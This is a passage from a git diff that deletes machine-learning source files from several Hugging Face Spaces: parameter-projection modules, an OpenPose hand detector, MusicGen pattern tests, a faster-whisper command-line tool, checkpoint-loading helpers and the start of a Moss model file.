nn.ModuleDict({}) - for k, v in param_shapes.items(): - self.projections[_sanitize_name(k)] = nn.Linear( - d_latent, int(np.prod(v)), device=device - ) - if init_scale is not None: - scale = init_scale / math.sqrt(d_latent) - mod = self.projections[_sanitize_name(k)] - nn.init.normal_(mod.weight, std=scale) - nn.init.zeros_(mod.bias) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - for k in self.param_shapes.keys(): - proj = self.projections[_sanitize_name(k)] - out[k] = proj(x).reshape([len(x), *self.param_shapes[k]]) - return out - - -class MLPParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - hidden_size: Optional[int] = None, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - if hidden_size is None: - hidden_size = d_latent - self.param_shapes = param_shapes - self.projections = nn.ModuleDict({}) - for k, v in 
param_shapes.items(): - self.projections[_sanitize_name(k)] = nn.Sequential( - nn.Linear(d_latent, hidden_size, device=device), - nn.GELU(), - nn.Linear(hidden_size, int(np.prod(v)), device=device), - ) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - for k in self.param_shapes.keys(): - proj = self.projections[_sanitize_name(k)] - out[k] = proj(x).reshape([len(x), *self.param_shapes[k]]) - return out - - -class ChannelsProj(nn.Module): - def __init__( - self, - *, - device: torch.device, - vectors: int, - channels: int, - d_latent: int, - init_scale: float = 1.0, - learned_scale: Optional[float] = None, - use_ln: bool = False, - ): - super().__init__() - self.proj = nn.Linear(d_latent, vectors * channels, device=device) - self.use_ln = use_ln - self.learned_scale = learned_scale - if use_ln: - self.norm = nn.LayerNorm(normalized_shape=(channels,), device=device) - if learned_scale is not None: - self.norm.weight.data.fill_(learned_scale) - scale = init_scale / math.sqrt(d_latent) - elif learned_scale is not None: - gain = torch.ones((channels,), device=device) * learned_scale - self.register_parameter("gain", nn.Parameter(gain)) - scale = init_scale / math.sqrt(d_latent) - else: - scale = init_scale / math.sqrt(d_latent * channels) - nn.init.normal_(self.proj.weight, std=scale) - nn.init.zeros_(self.proj.bias) - self.d_latent = d_latent - self.vectors = vectors - self.channels = channels - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x_bvd = x - w_vcd = self.proj.weight.view(self.vectors, self.channels, self.d_latent) - b_vc = self.proj.bias.view(1, self.vectors, self.channels) - h = torch.einsum("bvd,vcd->bvc", x_bvd, w_vcd) - if self.use_ln: - h = self.norm(h) - elif self.learned_scale is not None: - h = h * self.gain.view(1, 1, -1) - h = h + b_vc - return h - - -class ChannelsParamsProj(ParamsProj): - def __init__( - self, - *, - device: torch.device, - param_shapes: Dict[str, Tuple[int]], - d_latent: int, - init_scale: float = 1.0, - learned_scale: Optional[float] = None, - use_ln: bool = False, - ): - super().__init__(device=device, param_shapes=param_shapes, d_latent=d_latent) - self.param_shapes = param_shapes - self.projections = nn.ModuleDict({}) - self.flat_shapes = flatten_param_shapes(param_shapes) - self.learned_scale = learned_scale - self.use_ln = use_ln - for k, (vectors, channels) in self.flat_shapes.items(): - self.projections[_sanitize_name(k)] = ChannelsProj( - device=device, - vectors=vectors, - channels=channels, - d_latent=d_latent, - init_scale=init_scale, - learned_scale=learned_scale, - use_ln=use_ln, - ) - - def forward(self, x: torch.Tensor, options: Optional[AttrDict] = None) -> AttrDict: - out = AttrDict() - start = 0 - for k, shape in self.param_shapes.items(): - vectors, _ = self.flat_shapes[k] - end = start + vectors - x_bvd = x[:, start:end] - out[k] = self.projections[_sanitize_name(k)](x_bvd).reshape(len(x), *shape) - start = end - return out - - -def params_proj_from_config( - config: Dict[str, Any], device: torch.device, param_shapes: Dict[str, Tuple[int]], d_latent: int -): - name = config.pop("name") - if name == "linear": - return LinearParamsProj( - **config, device=device, param_shapes=param_shapes, d_latent=d_latent - ) - elif name == "mlp": - return MLPParamsProj(**config, device=device, param_shapes=param_shapes, d_latent=d_latent) - elif name == "channels": - return ChannelsParamsProj( - **config, device=device, param_shapes=param_shapes, d_latent=d_latent - ) - else: - 
raise ValueError(f"unknown params proj: {name}") - - -def _sanitize_name(x: str) -> str: - return x.replace(".", "__") diff --git a/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py b/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py deleted file mode 100644 index 3d0bf17165ad7eb225332b51f4a2aa16718664b2..0000000000000000000000000000000000000000 --- a/spaces/vumichien/canvas_controlnet/annotator/openpose/hand.py +++ /dev/null @@ -1,86 +0,0 @@ -import cv2 -import json -import numpy as np -import math -import time -from scipy.ndimage.filters import gaussian_filter -import matplotlib.pyplot as plt -import matplotlib -import torch -from skimage.measure import label - -from .model import handpose_model -from . import util - -class Hand(object): - def __init__(self, model_path): - self.model = handpose_model() - if torch.cuda.is_available(): - self.model = self.model.cuda() - print('cuda') - model_dict = util.transfer(self.model, torch.load(model_path)) - self.model.load_state_dict(model_dict) - self.model.eval() - - def __call__(self, oriImg): - scale_search = [0.5, 1.0, 1.5, 2.0] - # scale_search = [0.5] - boxsize = 368 - stride = 8 - padValue = 128 - thre = 0.05 - multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search] - heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 22)) - # paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38)) - - for m in range(len(multiplier)): - scale = multiplier[m] - imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC) - imageToTest_padded, pad = util.padRightDownCorner(imageToTest, stride, padValue) - im = np.transpose(np.float32(imageToTest_padded[:, :, :, np.newaxis]), (3, 2, 0, 1)) / 256 - 0.5 - im = np.ascontiguousarray(im) - - data = torch.from_numpy(im).float() - if torch.cuda.is_available(): - data = data.cuda() - # data = data.permute([2, 0, 1]).unsqueeze(0).float() - with torch.no_grad(): - output = self.model(data).cpu().numpy() - # output = self.model(data).numpy()q - - # extract outputs, resize, and remove padding - heatmap = np.transpose(np.squeeze(output), (1, 2, 0)) # output 1 is heatmaps - heatmap = cv2.resize(heatmap, (0, 0), fx=stride, fy=stride, interpolation=cv2.INTER_CUBIC) - heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :] - heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC) - - heatmap_avg += heatmap / len(multiplier) - - all_peaks = [] - for part in range(21): - map_ori = heatmap_avg[:, :, part] - one_heatmap = gaussian_filter(map_ori, sigma=3) - binary = np.ascontiguousarray(one_heatmap > thre, dtype=np.uint8) - # 全部小于阈值 - if np.sum(binary) == 0: - all_peaks.append([0, 0]) - continue - label_img, label_numbers = label(binary, return_num=True, connectivity=binary.ndim) - max_index = np.argmax([np.sum(map_ori[label_img == i]) for i in range(1, label_numbers + 1)]) + 1 - label_img[label_img != max_index] = 0 - map_ori[label_img == 0] = 0 - - y, x = util.npmax(map_ori) - all_peaks.append([x, y]) - return np.array(all_peaks) - -if __name__ == "__main__": - hand_estimation = Hand('../model/hand_pose_model.pth') - - # test_image = '../images/hand.jpg' - test_image = '../images/hand.jpg' - oriImg = cv2.imread(test_image) # B,G,R order - peaks = hand_estimation(oriImg) - canvas = util.draw_handpose(oriImg, peaks, True) - cv2.imshow('', canvas) - cv2.waitKey(0) \ No newline at end of file diff --git a/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py 
b/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py deleted file mode 100644 index b658f4779a369f9ec8dde692a61b7f0fe3485724..0000000000000000000000000000000000000000 --- a/spaces/w1zrd/MusicGen/tests/modules/test_codebooks_patterns.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import pytest -import torch - -from audiocraft.modules.codebooks_patterns import ( - DelayedPatternProvider, - ParallelPatternProvider, - Pattern, - UnrolledPatternProvider, -) - - -class TestParallelPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == s - 1 # account for the 1st empty step - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_max_delay(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == 0 - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestDelayedPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - delays = [ - list(range(n_q)), - [0] + [1] * (n_q - 1), - [0] + [4] * (n_q - 1), - ] - for delay in delays: - provider = DelayedPatternProvider(n_q, delay) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + max(delay) + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = DelayedPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == max(0, s - code.q - 1) - - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - @pytest.mark.parametrize("delay", [[0, 1, 2, 3], [0, 1, 1, 1], [0, 3, 3, 3], [0, 3]]) - def test_pattern_max_delay(self, timesteps: int, delay: list): - provider = DelayedPatternProvider(len(delay), delay) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max(delay) - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestUnrolledPatternProvider: - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_get_pattern(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert 
len(pattern.layout) == provider.num_virtual_steps(timesteps) + max_delay - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_pattern_max_delay(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max_delay - - -class TestPattern: - - def ref_build_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to build the sequence from the pattern without using fancy scatter.""" - bs, n_q, T = z.shape - z = z.cpu().numpy() - assert n_q == pattern.n_q - assert T <= pattern.timesteps - inp = torch.full((bs, n_q, len(pattern.layout)), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < T: - inp[:, q, s] = z[:, q, t] - return torch.from_numpy(inp) - - def ref_revert_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to revert the sequence from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, n_q, S = z.shape - assert pattern.n_q == n_q - inp = torch.full((bs, pattern.n_q, pattern.timesteps), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < pattern.timesteps: - inp[:, q, t] = z[:, q, s] - return torch.from_numpy(inp) - - def ref_revert_pattern_logits(self, z: torch.Tensor, pattern: Pattern, special_token: float): - """Reference method to revert the logits from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, card, n_q, S = z.shape - assert pattern.n_q == n_q - ref_layout = pattern.layout - inp = torch.full((bs, card, pattern.n_q, pattern.timesteps), special_token, dtype=torch.float).numpy() - inp[:] = special_token - for s, v in enumerate(ref_layout[1:]): - if s < S: - for (t, q) in v: - if t < pattern.timesteps: - inp[:, :, q, t] = z[:, :, q, s] - return torch.from_numpy(inp) - - def _get_pattern_providers(self, n_q: int): - pattern_provider_1 = ParallelPatternProvider(n_q) - pattern_provider_2 = DelayedPatternProvider(n_q, list(range(n_q))) - pattern_provider_3 = DelayedPatternProvider(n_q, [0] + [1] * (n_q - 1)) - pattern_provider_4 = UnrolledPatternProvider( - n_q, flattening=list(range(n_q)), delays=[0] * n_q - ) - pattern_provider_5 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] * n_q - ) - pattern_provider_6 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] + [5] * (n_q - 1) - ) - return [ - pattern_provider_1, - pattern_provider_2, - pattern_provider_3, - pattern_provider_4, - pattern_provider_5, - pattern_provider_6, - ] - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_build_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # we can correctly build the sequence from the pattern - z = torch.randint(0, card, (bs, n_q, timesteps)) - ref_res = self.ref_build_pattern_sequence(z, pattern, special_token) - res, indexes, mask = 
pattern.build_pattern_sequence(z, special_token) - assert (res == ref_res).float().mean() == 1.0 - - # expected assertion fails on the number of timesteps - invalid_timesteps = [timesteps + 1] - if pattern.num_sequence_steps != pattern.timesteps: - invalid_timesteps.append(pattern.num_sequence_steps) - for i_timesteps in invalid_timesteps: - z2 = torch.randint(0, card, (bs, n_q, i_timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z2, special_token) - - # expected assertion fails on the number of codebooks - invalid_qs = [0, n_q - 1, n_q + 1] - for i_q in invalid_qs: - z3 = torch.randint(0, card, (bs, i_q, timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z3, special_token) - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_revert_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - ref_out = self.ref_revert_pattern_sequence(s, pattern, special_token) - # ensure our reference script retrieve the original sequence - assert z.shape == ref_out.shape - assert (z == ref_out).float().mean() == 1.0 - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_sequence(s, special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - @pytest.mark.parametrize("card", [1, 2, 256, 1024]) - def test_revert_pattern_logits(self, n_q: int, timesteps: int, card: int): - bs = 2 - special_token = card - logits_special_token = float('nan') - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - logits = torch.randn((bs, card, n_q, s.shape[-1])) - ref_out = self.ref_revert_pattern_logits(logits, pattern, logits_special_token) - # ensure our reference script retrieve the original sequence - assert ref_out.shape == torch.Size([bs, card, n_q, timesteps]) - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_logits(logits, logits_special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 diff --git a/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py b/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py deleted file mode 100644 index 83dd15c3df1d9f40baf0091a373fa224532c9ddd..0000000000000000000000000000000000000000 --- a/spaces/wenpeng/Sod_Inpaint/inpaint/saicinpainting/training/modules/depthwise_sep_conv.py +++ /dev/null @@ -1,17 +0,0 @@ -import torch -import torch.nn as nn - -class DepthWiseSeperableConv(nn.Module): - def __init__(self, in_dim, out_dim, *args, **kwargs): - super().__init__() - if 'groups' in kwargs: - # ignoring groups for Depthwise Sep Conv - del kwargs['groups'] - - self.depthwise = nn.Conv2d(in_dim, in_dim, *args, groups=in_dim, **kwargs) - 
self.pointwise = nn.Conv2d(in_dim, out_dim, kernel_size=1) - - def forward(self, x): - out = self.depthwise(x) - out = self.pointwise(out) - return out \ No newline at end of file diff --git a/spaces/wong26/faster-whisper-webui/cli.py b/spaces/wong26/faster-whisper-webui/cli.py deleted file mode 100644 index e0e21f2a6255db83bbc2c6e5ad08c56e85f7ac9b..0000000000000000000000000000000000000000 --- a/spaces/wong26/faster-whisper-webui/cli.py +++ /dev/null @@ -1,188 +0,0 @@ -import argparse -import os -import pathlib -from urllib.parse import urlparse -import warnings -import numpy as np - -import torch -from app import VadOptions, WhisperTranscriber -from src.config import VAD_INITIAL_PROMPT_MODE_VALUES, ApplicationConfig, VadInitialPromptMode -from src.download import download_url -from src.languages import get_language_names - -from src.utils import optional_float, optional_int, str2bool -from src.whisper.whisperFactory import create_whisper_container - -def cli(): - app_config = ApplicationConfig.create_default() - whisper_models = app_config.get_model_names() - - # For the CLI, we fallback to saving the output to the current directory - output_dir = app_config.output_dir if app_config.output_dir is not None else "." - - # Environment variable overrides - default_whisper_implementation = os.environ.get("WHISPER_IMPLEMENTATION", app_config.whisper_implementation) - - parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) - parser.add_argument("audio", nargs="+", type=str, \ - help="audio file(s) to transcribe") - parser.add_argument("--model", default=app_config.default_model_name, choices=whisper_models, \ - help="name of the Whisper model to use") # medium - parser.add_argument("--model_dir", type=str, default=app_config.model_dir, \ - help="the path to save model files; uses ~/.cache/whisper by default") - parser.add_argument("--device", default=app_config.device, \ - help="device to use for PyTorch inference") - parser.add_argument("--output_dir", "-o", type=str, default=output_dir, \ - help="directory to save the outputs") - parser.add_argument("--verbose", type=str2bool, default=app_config.verbose, \ - help="whether to print out the progress and debug messages") - parser.add_argument("--whisper_implementation", type=str, default=default_whisper_implementation, choices=["whisper", "faster-whisper"],\ - help="the Whisper implementation to use") - - parser.add_argument("--task", type=str, default=app_config.task, choices=["transcribe", "translate"], \ - help="whether to perform X->X speech recognition ('transcribe') or X->English translation ('translate')") - parser.add_argument("--language", type=str, default=app_config.language, choices=sorted(get_language_names()), \ - help="language spoken in the audio, specify None to perform language detection") - - parser.add_argument("--vad", type=str, default=app_config.default_vad, choices=["none", "silero-vad", "silero-vad-skip-gaps", "silero-vad-expand-into-gaps", "periodic-vad"], \ - help="The voice activity detection algorithm to use") # silero-vad - parser.add_argument("--vad_initial_prompt_mode", type=str, default=app_config.vad_initial_prompt_mode, choices=VAD_INITIAL_PROMPT_MODE_VALUES, \ - help="Whether or not to prepend the initial prompt to each VAD segment (prepend_all_segments), or just the first segment (prepend_first_segment)") # prepend_first_segment - parser.add_argument("--vad_merge_window", type=optional_float, default=app_config.vad_merge_window, \ - help="The window size (in seconds) to merge 
voice segments") - parser.add_argument("--vad_max_merge_size", type=optional_float, default=app_config.vad_max_merge_size,\ - help="The maximum size (in seconds) of a voice segment") - parser.add_argument("--vad_padding", type=optional_float, default=app_config.vad_padding, \ - help="The padding (in seconds) to add to each voice segment") - parser.add_argument("--vad_prompt_window", type=optional_float, default=app_config.vad_prompt_window, \ - help="The window size of the prompt to pass to Whisper") - parser.add_argument("--vad_cpu_cores", type=int, default=app_config.vad_cpu_cores, \ - help="The number of CPU cores to use for VAD pre-processing.") # 1 - parser.add_argument("--vad_parallel_devices", type=str, default=app_config.vad_parallel_devices, \ - help="A commma delimited list of CUDA devices to use for parallel processing. If None, disable parallel processing.") # "" - parser.add_argument("--auto_parallel", type=bool, default=app_config.auto_parallel, \ - help="True to use all available GPUs and CPU cores for processing. Use vad_cpu_cores/vad_parallel_devices to specify the number of CPU cores/GPUs to use.") # False - - parser.add_argument("--temperature", type=float, default=app_config.temperature, \ - help="temperature to use for sampling") - parser.add_argument("--best_of", type=optional_int, default=app_config.best_of, \ - help="number of candidates when sampling with non-zero temperature") - parser.add_argument("--beam_size", type=optional_int, default=app_config.beam_size, \ - help="number of beams in beam search, only applicable when temperature is zero") - parser.add_argument("--patience", type=float, default=app_config.patience, \ - help="optional patience value to use in beam decoding, as in https://arxiv.org/abs/2204.05424, the default (1.0) is equivalent to conventional beam search") - parser.add_argument("--length_penalty", type=float, default=app_config.length_penalty, \ - help="optional token length penalty coefficient (alpha) as in https://arxiv.org/abs/1609.08144, uses simple lengt normalization by default") - - parser.add_argument("--suppress_tokens", type=str, default=app_config.suppress_tokens, \ - help="comma-separated list of token ids to suppress during sampling; '-1' will suppress most special characters except common punctuations") - parser.add_argument("--initial_prompt", type=str, default=app_config.initial_prompt, \ - help="optional text to provide as a prompt for the first window.") - parser.add_argument("--condition_on_previous_text", type=str2bool, default=app_config.condition_on_previous_text, \ - help="if True, provide the previous output of the model as a prompt for the next window; disabling may make the text inconsistent across windows, but the model becomes less prone to getting stuck in a failure loop") - parser.add_argument("--fp16", type=str2bool, default=app_config.fp16, \ - help="whether to perform inference in fp16; True by default") - parser.add_argument("--compute_type", type=str, default=app_config.compute_type, choices=["default", "auto", "int8", "int8_float16", "int16", "float16", "float32"], \ - help="the compute type to use for inference") - - parser.add_argument("--temperature_increment_on_fallback", type=optional_float, default=app_config.temperature_increment_on_fallback, \ - help="temperature to increase when falling back when the decoding fails to meet either of the thresholds below") - parser.add_argument("--compression_ratio_threshold", type=optional_float, default=app_config.compression_ratio_threshold, \ - help="if the gzip 
compression ratio is higher than this value, treat the decoding as failed") - parser.add_argument("--logprob_threshold", type=optional_float, default=app_config.logprob_threshold, \ - help="if the average log probability is lower than this value, treat the decoding as failed") - parser.add_argument("--no_speech_threshold", type=optional_float, default=app_config.no_speech_threshold, \ - help="if the probability of the <|nospeech|> token is higher than this value AND the decoding has failed due to `logprob_threshold`, consider the segment as silence") - - parser.add_argument("--word_timestamps", type=str2bool, default=app_config.word_timestamps, - help="(experimental) extract word-level timestamps and refine the results based on them") - parser.add_argument("--prepend_punctuations", type=str, default=app_config.prepend_punctuations, - help="if word_timestamps is True, merge these punctuation symbols with the next word") - parser.add_argument("--append_punctuations", type=str, default=app_config.append_punctuations, - help="if word_timestamps is True, merge these punctuation symbols with the previous word") - parser.add_argument("--highlight_words", type=str2bool, default=app_config.highlight_words, - help="(requires --word_timestamps True) underline each word as it is spoken in srt and vtt") - parser.add_argument("--threads", type=optional_int, default=0, - help="number of threads used by torch for CPU inference; supercedes MKL_NUM_THREADS/OMP_NUM_THREADS") - - args = parser.parse_args().__dict__ - model_name: str = args.pop("model") - model_dir: str = args.pop("model_dir") - output_dir: str = args.pop("output_dir") - device: str = args.pop("device") - os.makedirs(output_dir, exist_ok=True) - - if (threads := args.pop("threads")) > 0: - torch.set_num_threads(threads) - - whisper_implementation = args.pop("whisper_implementation") - print(f"Using {whisper_implementation} for Whisper") - - if model_name.endswith(".en") and args["language"] not in {"en", "English"}: - warnings.warn(f"{model_name} is an English-only model but receipted '{args['language']}'; using English instead.") - args["language"] = "en" - - temperature = args.pop("temperature") - temperature_increment_on_fallback = args.pop("temperature_increment_on_fallback") - if temperature_increment_on_fallback is not None: - temperature = tuple(np.arange(temperature, 1.0 + 1e-6, temperature_increment_on_fallback)) - else: - temperature = [temperature] - - vad = args.pop("vad") - vad_initial_prompt_mode = args.pop("vad_initial_prompt_mode") - vad_merge_window = args.pop("vad_merge_window") - vad_max_merge_size = args.pop("vad_max_merge_size") - vad_padding = args.pop("vad_padding") - vad_prompt_window = args.pop("vad_prompt_window") - vad_cpu_cores = args.pop("vad_cpu_cores") - auto_parallel = args.pop("auto_parallel") - - compute_type = args.pop("compute_type") - highlight_words = args.pop("highlight_words") - - transcriber = WhisperTranscriber(delete_uploaded_files=False, vad_cpu_cores=vad_cpu_cores, app_config=app_config) - transcriber.set_parallel_devices(args.pop("vad_parallel_devices")) - transcriber.set_auto_parallel(auto_parallel) - - model = create_whisper_container(whisper_implementation=whisper_implementation, model_name=model_name, - device=device, compute_type=compute_type, download_root=model_dir, models=app_config.models) - - if (transcriber._has_parallel_devices()): - print("Using parallel devices:", transcriber.parallel_device_list) - - for audio_path in args.pop("audio"): - sources = [] - - # Detect URL and download 
the audio - if (uri_validator(audio_path)): - # Download from YouTube/URL directly - for source_path in download_url(audio_path, maxDuration=-1, destinationDirectory=output_dir, playlistItems=None): - source_name = os.path.basename(source_path) - sources.append({ "path": source_path, "name": source_name }) - else: - sources.append({ "path": audio_path, "name": os.path.basename(audio_path) }) - - for source in sources: - source_path = source["path"] - source_name = source["name"] - - vadOptions = VadOptions(vad, vad_merge_window, vad_max_merge_size, vad_padding, vad_prompt_window, - VadInitialPromptMode.from_string(vad_initial_prompt_mode)) - - result = transcriber.transcribe_file(model, source_path, temperature=temperature, vadOptions=vadOptions, **args) - - transcriber.write_result(result, source_name, output_dir, highlight_words) - - transcriber.close() - -def uri_validator(x): - try: - result = urlparse(x) - return all([result.scheme, result.netloc]) - except: - return False - -if __name__ == '__main__': - cli() \ No newline at end of file diff --git a/spaces/xdecoder/Demo/utils/model_loading.py b/spaces/xdecoder/Demo/utils/model_loading.py deleted file mode 100644 index e679cb7f59f19a3834110ace1f56a1bd077d0049..0000000000000000000000000000000000000000 --- a/spaces/xdecoder/Demo/utils/model_loading.py +++ /dev/null @@ -1,42 +0,0 @@ -# -------------------------------------------------------- -# X-Decoder -- Generalized Decoding for Pixel, Image, and Language -# Copyright (c) 2022 Microsoft -# Licensed under The MIT License [see LICENSE for details] -# Written by Xueyan Zou (xueyan@cs.wisc.edu) -# -------------------------------------------------------- - -import logging -from utils.distributed import is_main_process -logger = logging.getLogger(__name__) - - -def align_and_update_state_dicts(model_state_dict, ckpt_state_dict): - model_keys = sorted(model_state_dict.keys()) - ckpt_keys = sorted(ckpt_state_dict.keys()) - result_dicts = {} - matched_log = [] - unmatched_log = [] - unloaded_log = [] - for model_key in model_keys: - model_weight = model_state_dict[model_key] - if model_key in ckpt_keys: - ckpt_weight = ckpt_state_dict[model_key] - if model_weight.shape == ckpt_weight.shape: - result_dicts[model_key] = ckpt_weight - ckpt_keys.pop(ckpt_keys.index(model_key)) - matched_log.append("Loaded {}, Model Shape: {} <-> Ckpt Shape: {}".format(model_key, model_weight.shape, ckpt_weight.shape)) - else: - unmatched_log.append("*UNMATCHED* {}, Model Shape: {} <-> Ckpt Shape: {}".format(model_key, model_weight.shape, ckpt_weight.shape)) - else: - unloaded_log.append("*UNLOADED* {}, Model Shape: {}".format(model_key, model_weight.shape)) - - if is_main_process(): - for info in matched_log: - logger.info(info) - for info in unloaded_log: - logger.warning(info) - for key in ckpt_keys: - logger.warning("$UNUSED$ {}, Ckpt Shape: {}".format(key, ckpt_state_dict[key].shape)) - for info in unmatched_log: - logger.warning(info) - return result_dicts \ No newline at end of file diff --git a/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py b/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py deleted file mode 100644 index b7adea5bca857f7fdd6399dde7ce359f8f8cecfe..0000000000000000000000000000000000000000 --- a/spaces/xnetba/Chat_advance/modules/models/modeling_moss.py +++ /dev/null @@ -1,711 +0,0 @@ -""" PyTorch Moss model.""" - -from typing import Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import CrossEntropyLoss - -from 
transformers.activations import ACT2FN -from transformers.modeling_utils import PreTrainedModel -from transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast -from transformers.utils import ( - add_code_sample_docstrings, - add_start_docstrings, - add_start_docstrings_to_model_forward, - logging -) - -from .configuration_moss import MossConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "fnlp/moss-moon-003-base" -_CONFIG_FOR_DOC = "MossConfig" - - -MOSS_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "fnlp/moss-moon-003-base", - "fnlp/moss-moon-003-sft", - "fnlp/moss-moon-003-sft-plugin", -] - - -# Copied from transformers.models.gptj.modeling_gptj.create_sinusoidal_positions -def create_sinusoidal_positions(num_pos: int, dim: int) -> torch.Tensor: - inv_freq = 1.0 / (10000 ** (torch.arange(0, dim, 2) / dim)) - sinusoid_inp = torch.einsum("i , j -> i j", torch.arange(num_pos, dtype=torch.float), inv_freq).float() - return torch.cat((torch.sin(sinusoid_inp), torch.cos(sinusoid_inp)), dim=1) - - -# Copied from transformers.models.gptj.modeling_gptj.rotate_every_two -def rotate_every_two(x: torch.Tensor) -> torch.Tensor: - x1 = x[:, :, :, ::2] - x2 = x[:, :, :, 